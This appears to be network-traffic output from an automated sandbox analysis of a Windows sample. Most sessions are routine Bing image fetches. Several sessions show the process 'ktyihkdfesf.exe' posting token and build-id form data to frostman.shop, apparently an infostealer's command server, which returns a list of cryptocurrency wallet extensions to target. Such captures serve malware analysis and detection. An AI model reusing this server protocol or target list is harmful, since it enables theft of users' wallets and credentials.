                                                                                                                                                                                                                                                                                                Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49732 | 150.171.27.10 | 443 | |

Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:11 UTC | 375 | OUT | GET /th?id=OADD2.10239360433542_1UJC4903W7XNIUU73&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Host: tse1.mm.bing.net
Connection: Keep-Alive
2024-12-20 06:31:12 UTC | 856 | IN | HTTP/1.1 200 OK
Cache-Control: public, max-age=2592000
Content-Length: 843567
Content-Type: image/jpeg
X-Cache: TCP_HIT
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
X-MSEdge-Ref: Ref A: 65FEA4B0E1F24E06BACFE43FAE0F565A Ref B: EWR311000106029 Ref C: 2024-12-20T06:31:12Z
Date: Fri, 20 Dec 2024 06:31:11 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49733 | 150.171.27.10 | 443 | |

Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:11 UTC | 346 | OUT | GET /th?id=OADD2.10239360433543_1F4HJPO10Z3VYH0SK&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Host: tse1.mm.bing.net
Connection: Keep-Alive
2024-12-20 06:31:12 UTC | 854 | IN | HTTP/1.1 200 OK
Cache-Control: public, max-age=2592000
Content-Length: 688476
Content-Type: image/jpeg
X-Cache: TCP_HIT
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
X-MSEdge-Ref: Ref A: 3BB0C3FFDFB34C628DE551FFE1710E1A Ref B: EWR30EDGE0408 Ref C: 2024-12-20T06:31:12Z
Date: Fri, 20 Dec 2024 06:31:11 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49735 | 150.171.27.10 | 443 | |

Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:12 UTC | 346 | OUT | GET /th?id=OADD2.10239359955653_16Q8BS61PKT108CUW&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Host: tse1.mm.bing.net
Connection: Keep-Alive
2024-12-20 06:31:12 UTC | 854 | IN | HTTP/1.1 200 OK
Cache-Control: public, max-age=2592000
Content-Length: 498769
Content-Type: image/jpeg
X-Cache: TCP_HIT
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
X-MSEdge-Ref: Ref A: F0F55B6555034F02B1BB9461298B779C Ref B: EWR30EDGE1614 Ref C: 2024-12-20T06:31:12Z
Date: Fri, 20 Dec 2024 06:31:12 GMT
Connection: close
                                                                                                                                                                                                                                                                                                Data Ascii: WVg-R4OGP_3|Z5t{?]{}{RO-gb|!!oT,^+OU-ZM/mc<#s7|EwPGq}O+\SQyEi3k>yqM*6=+>'xM-8avTtf~>aj.H%he_6u5Q8:olTS
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:13 UTC16384INData Raw: 07 96 ce bf ed 56 18 89 d5 4e 9e 13 97 d5 df f2 f5 25 c9 73 3a 8b 63 9d f1 05 86 8d 75 3c 53 47 04 8c d2 ee f2 91 13 e5 4f 9a ab cd a3 cf 17 89 fc c9 a4 ff 00 45 95 17 ed 1b 13 f8 47 52 bf 4a d1 f0 8e a1 14 5a b4 4d 75 1c 72 d9 dd 6e 64 df ec b5 7b 43 d6 60 8e 77 b7 b8 79 25 9a 2f 9b e7 f9 b7 a9 e8 d5 b4 65 52 9b 4b 75 6e a5 af 7d 21 f3 4a ba a4 fa b2 e8 bb 16 18 13 f7 56 ff 00 c4 f0 8e 37 fe 3d 6b 4f c3 7e 11 d7 6e 34 0b bb 89 ad 27 8a d6 58 95 93 66 df 2b fd e3 5c ee bd 6d 63 14 8f f6 59 3c 8b 85 7d d1 3f f1 6d fe ef fb b5 d2 6a 9f 19 35 a9 3c 1d 16 87 6b a6 d8 fd a9 51 7e d7 73 0f cd fb b4 fb a3 1f ce bc dc 4f d7 25 08 47 09 14 d3 7a df a2 ee 6a 9b 8a f7 8d 2f 87 51 5f 68 7a 5d a5 9c 73 da b5 f3 6a ca df be 83 cd 8b 68 5e df ec d7 56 f6 5e 3a f3 35 6d
                                                                                                                                                                                                                                                                                                Data Ascii: VN%s:cu<SGOEGRJZMurnd{C`wy%/eRKun}!JV7=kO~n4'Xf+\mcY<}?mj5<kQ~sO%Gzj/Q_hz]sjh^V^:5m


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 49736 | 150.171.27.10 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:12 UTC | 375 | OUT | GET /th?id=OADD2.10239359955652_1UH15L5Z2LXM3P8PA&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                                                Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
2024-12-20 06:31:12 UTC | 854 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                Content-Length: 591970
                                                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                X-MSEdge-Ref: Ref A: 7D549C6CE6284FF1A02FA3338EA5E34F Ref B: EWR30EDGE0921 Ref C: 2024-12-20T06:31:12Z
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:11 GMT
                                                                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49742 | 116.203.12.114 | 443 | 1468 | C:\Users\user\Desktop\ktyihkdfesf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:12 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----K6PZCBASJEKFU3ECBA1N
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 332
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-20 06:31:12 UTC | 332 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 4b 36 50 5a 43 42 41 53 4a 45 4b 46 55 33 45 43 42 41 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 36 50 5a 43 42 41 53 4a 45 4b 46 55 33 45 43 42 41 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 36 50 5a 43 42 41 53 4a 45 4b 46 55 33 45 43 42 41 31 4e 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------K6PZCBASJEKFU3ECBA1NContent-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------K6PZCBASJEKFU3ECBA1NContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------K6PZCBASJEKFU3ECBA1NCont
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:13 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:13 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:13 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49743 | 150.171.27.10 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:13 UTC | 346 | OUT | GET /th?id=OADD2.10239381681309_1UONBZH0MSLU4XT86&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Host: tse1.mm.bing.net
Connection: Keep-Alive
2024-12-20 06:31:14 UTC | 856 | IN | HTTP/1.1 200 OK
Cache-Control: public, max-age=2592000
Content-Length: 585710
Content-Type: image/jpeg
X-Cache: TCP_HIT
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
X-MSEdge-Ref: Ref A: AFD3716E6EC04951B5486142879D9CAC Ref B: EWR311000104011 Ref C: 2024-12-20T06:31:14Z
Date: Fri, 20 Dec 2024 06:31:13 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 49748 | 116.203.12.114 | 443 | 1468 | C:\Users\user\Desktop\ktyihkdfesf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:15 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----1DBAI5X4OZU3EUASRQ16
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: frostman.shop
Content-Length: 6657
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-20 06:31:15 UTC | 6657 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 31 44 42 41 49 35 58 34 4f 5a 55 33 45 55 41 53 52 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 31 44 42 41 49 35 58 34 4f 5a 55 33 45 55 41 53 52 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 31 44 42 41 49 35 58 34 4f 5a 55 33 45 55 41 53 52 51 31 36 0d 0a 43 6f 6e 74
Data Ascii: ------1DBAI5X4OZU3EUASRQ16Content-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------1DBAI5X4OZU3EUASRQ16Content-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------1DBAI5X4OZU3EUASRQ16Cont
2024-12-20 06:31:16 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Dec 2024 06:31:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-20 06:31:16 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 49749 | 150.171.27.10 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:15 UTC | 346 | OUT | GET /th?id=OADD2.10239381681310_13V04GE58D8UEEUDW&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Host: tse1.mm.bing.net
Connection: Keep-Alive
2024-12-20 06:31:15 UTC | 856 | IN | HTTP/1.1 200 OK
Cache-Control: public, max-age=2592000
Content-Length: 733061
Content-Type: image/jpeg
X-Cache: TCP_HIT
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
X-MSEdge-Ref: Ref A: A9825D2740A349CDAAB3B24D9AAF07B2 Ref B: EWR311000103025 Ref C: 2024-12-20T06:31:15Z
Date: Fri, 20 Dec 2024 06:31:15 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 49750 | 150.171.27.10 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:15 UTC | 375 | OUT | GET /th?id=OADD2.10239317301222_1FJU5PIOORZE0KYBN&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Host: tse1.mm.bing.net
Connection: Keep-Alive
2024-12-20 06:31:16 UTC | 854 | IN | HTTP/1.1 200 OK
Cache-Control: public, max-age=2592000
Content-Length: 606760
Content-Type: image/jpeg
X-Cache: TCP_HIT
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
X-MSEdge-Ref: Ref A: 87148BD383854DB892C04DF014DC5F80 Ref B: EWR30EDGE0309 Ref C: 2024-12-20T06:31:15Z
Date: Fri, 20 Dec 2024 06:31:15 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 49751 | 150.171.27.10 | 443 | |

Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:15 UTC | 346 | OUT | GET /th?id=OADD2.10239317301631_1JS0AMCX251CLJ5OX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Host: tse1.mm.bing.net
Connection: Keep-Alive
2024-12-20 06:31:16 UTC | 854 | IN | HTTP/1.1 200 OK
Cache-Control: public, max-age=2592000
Content-Length: 640791
Content-Type: image/jpeg
X-Cache: TCP_HIT
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
X-MSEdge-Ref: Ref A: E343A48FC343443387A713A0A3137A6F Ref B: EWR30EDGE1609 Ref C: 2024-12-20T06:31:15Z
Date: Fri, 20 Dec 2024 06:31:15 GMT
Connection: close
                                                                                                                                                                                                                                                                                                Data Ascii: e]Y]3I{I=4+~}.-Zy?}7i4~KI:?c=_RWGSlEKHK:KI{i.q_4J$$X{Uh'mt7+iql&g7mww[
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: c9 3c a8 52 de da dd 17 f0 ad 69 ef 34 5b 2f 33 4e d3 a6 86 3b ab 88 ff 00 79 73 ff 00 d9 56 5d f7 85 7c 37 e2 0d 3e 38 f5 4b bf dc 7c 92 7d 9a c6 6d 89 ff 00 02 db f7 96 b8 9f 89 5e 00 9e ef 4f f2 3c 3d e2 4b 4b 28 3f e5 a5 b4 b2 fc f2 7f db 6f fd 96 bc 8a 3c 8d da 4e c7 d6 54 95 7a 70 7c b0 52 b7 67 6b fc 8b 5e 38 f1 0e 8a 9a 4c 8f 3e a5 77 e5 c7 fe b2 48 ab e6 cf 8f 1a 8d 86 b1 6b 6d 7b 0e 64 9e 39 3c bf 32 4f ee ff 00 76 ba 2d 72 c7 ec fa 7d cd 95 d5 e4 de 7c 7f f2 ce 5f b9 5e 61 e2 69 cf 97 22 4d f7 3f e5 95 7d 2e 5f 87 8d 39 5d 33 e1 73 ac c2 75 e0 e1 38 a4 73 bb 6a f6 8d a5 6a 1a ae a1 1d 9e 9d 69 35 c4 f2 7f ab 8e 3f bf 54 63 6f ef d7 bf 7e cd 5a 64 1a 4f 86 7f b4 ee a2 86 3b ad 56 4f 2e 39 65 ff 00 96 71 7f f5 eb d2 c6 e2 be ad 4b 9d 2b b3 e7 b0
                                                                                                                                                                                                                                                                                                Data Ascii: <Ri4[/3N;ysV]|7>8K|}m^O<=KK(?o<NTzp|Rgk^8L>wHkm{d9<2Ov-r}|_^ai"M?}._9]3su8sjji5?Tco~ZdO;VO.9eqK+
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:16 UTC16384INData Raw: ac fa 69 e8 7b 94 70 f1 5f 16 af cc b4 f2 58 24 b2 3d ed e4 b7 0f ff 00 2d 3c c9 77 f9 75 c2 78 fe db 42 8a 69 35 18 7c 9f b5 49 27 fc bc cb fc 1f e7 f8 6b 6f ec 72 7f af 79 be cf 6b 27 fa cf e0 ff 00 2d 5c 97 8b b4 1b 49 61 8e f7 ce fe ce f2 f7 c7 17 ef 7f e5 97 f7 3f da ab a1 55 73 ea 18 aa 72 54 9f 22 38 5b eb cf 36 6f 23 57 d4 a6 fb 2f 98 f2 5b 5b 7d c4 8e b9 3f 1f ea 1b fc bb 28 26 f3 20 8e 4f 33 fe 9b 6f ff 00 7e 9d f1 42 28 f4 cd 42 3b 5d 3a f2 5b d9 3c bf f4 9f 37 7b bc 75 c5 dd 34 97 b3 6f f2 7c cf f9 e7 25 7b d4 a9 25 69 c7 63 e2 f1 78 99 ae 6a 52 5a 9e f9 f0 bb 5e b4 f1 1f 84 fe c5 e4 cd fd b1 1c 6f 25 ef da 7f e5 ef 6f f1 47 b7 f8 6a 9d f7 91 77 f2 6a f3 43 1c 1e 6f fc 79 5b 6f df fe ca 7c b5 e1 9a 6e ab a9 68 9e 21 b6 d5 2c b5 29 ac a7 b7 93
                                                                                                                                                                                                                                                                                                Data Ascii: i{p_X$=-<wuxBi5|I'koryk'-\Ia?UsrT"8[6o#W/[[}?(& O3o~B(B;]:[<7{u4o|%{%icxjRZ^o%oGjwjCoy[o|nh!,)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 49752 | 150.171.27.10 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:15 UTC | 346 | OUT | GET /th?id=OADD2.10239381795371_1OWBWRW5WQA079L9Q&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                                                Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
2024-12-20 06:31:16 UTC | 854 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                Content-Length: 895462
                                                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                X-MSEdge-Ref: Ref A: 48DC614D16334645B84C1F67E3B73E41 Ref B: EWR30EDGE0110 Ref C: 2024-12-20T06:31:16Z
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:15 GMT
                                                                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 49753 | 116.203.12.114 | 443 | 1468 | C:\Users\user\Desktop\ktyihkdfesf.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-20 06:31:16 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----1DBAI5X4OZU3EUASRQ16
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 489
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
